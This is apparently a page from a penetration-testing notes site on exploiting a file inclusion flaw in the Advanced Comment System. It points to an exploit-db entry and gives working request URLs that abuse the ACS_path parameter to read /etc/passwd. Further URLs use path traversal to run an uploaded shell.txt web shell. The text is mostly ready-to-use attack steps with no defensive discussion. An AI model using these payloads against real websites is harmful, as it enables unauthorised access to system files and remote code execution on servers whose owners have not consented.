Vulnerable Components Installed

Search for ACS exploit on google

This link will come: https://www.exploit-db.com/exploits/9623/

Exploit says if we browse to /advanced_comment_system/index.php?ACS_path=shell.txt?

We will get access

Visit: http://site/advanced_comment_system/index.php?ACS_path=/etc/passwd?

Note the ? in the end is important

We can also upload shell in the website with txt extension shell.txt in cases where php shell upload is not allowed and then using this vulnerability, we can run the shell:

http://site/advanced_comment_system/index.php?ACS_path=../../path_to_shell/shell.txt?

PreviousDefault/Weak Password in Public Software NextVulnerable Components Installed 2

Last updated 1 year ago